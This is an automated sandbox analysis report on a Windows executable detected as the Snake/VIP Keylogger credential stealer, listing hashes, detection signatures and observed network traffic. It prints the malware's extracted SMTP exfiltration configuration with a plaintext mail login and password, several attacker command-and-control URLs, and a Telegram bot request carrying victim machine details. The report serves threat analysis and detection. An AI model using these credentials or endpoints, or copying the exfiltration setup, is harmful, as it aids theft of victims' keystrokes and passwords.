Windows Analysis Report
NXPYoHNSgv.exe

Overview

General Information

Sample name: NXPYoHNSgv.exe
renamed because original name is a hash value
Original sample name: 5cce2f7bc1fd777f047c4b38e1112e49.exe
Analysis ID: 1528775
MD5: 5cce2f7bc1fd777f047c4b38e1112e49
SHA1: e3476ecbbd1826b6f1ccdabb5b49e638171557a0
SHA256: e82a67b020ca02403b8444cc5249ee827353082ee68a814a7c8053944e8b59b7
Tags: 32exeMassLoggertrojan
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for domain / URL
Source: http://51.38.247.67:8081/_send_.php?L Virustotal: Detection: 7% Perma Link
Source: http://aborters.duckdns.org:8081 Virustotal: Detection: 13% Perma Link
Source: http://varders.kozow.com:8081 Virustotal: Detection: 14% Perma Link
Source: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded Virustotal: Detection: 7% Perma Link
Source: http://anotherarmy.dns.army:8081 Virustotal: Detection: 17% Perma Link
Multi AV Scanner detection for submitted file
Source: NXPYoHNSgv.exe ReversingLabs: Detection: 60%
Source: NXPYoHNSgv.exe Virustotal: Detection: 39% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: NXPYoHNSgv.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: NXPYoHNSgv.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: NXPYoHNSgv.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: jBGm.pdb source: NXPYoHNSgv.exe
Source: Binary string: jBGm.pdbSHA256 source: NXPYoHNSgv.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 0753833Ah 0_2_0753792C
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 0321F8E9h 5_2_0321F631
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 0321FD41h 5_2_0321FA88
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC0D0Dh 5_2_06FC0B30
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC1697h 5_2_06FC0B30
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC31E0h 5_2_06FC2DC8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC2C19h 5_2_06FC2968
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCE959h 5_2_06FCE6B0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_06FC0673
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCE501h 5_2_06FCE258
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCE0A9h 5_2_06FCDE00
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCF661h 5_2_06FCF3B8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCF209h 5_2_06FCEF60
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCEDB1h 5_2_06FCEB08
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCD3A1h 5_2_06FCD0F8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCCF49h 5_2_06FCCCA0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_06FC0853
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_06FC0040
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCFAB9h 5_2_06FCF810
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC31E0h 5_2_06FC2DC2
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC31E0h 5_2_06FC2DBE
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCDC51h 5_2_06FCD9A8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCD7F9h 5_2_06FCD550
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC31E0h 5_2_06FC310E

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49827 -> 217.12.218.219:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:035347%0D%0ADate%20and%20Time:%2008/10/2024%20/%2017:20:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20035347%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 217.12.218.219 217.12.218.219
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: ITLDC-NLUA ITLDC-NLUA
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49717 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49712 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49716 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49748 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49740 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49780 -> 188.114.96.3:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.6:49827 -> 217.12.218.219:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:035347%0D%0ADate%20and%20Time:%2008/10/2024%20/%2017:20:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20035347%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.jhxkgroup.online
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 07:47:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crt0
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/RapidSSLGlobalc
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0Q
Source: NXPYoHNSgv.exe, 00000000.00000002.2153199131.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
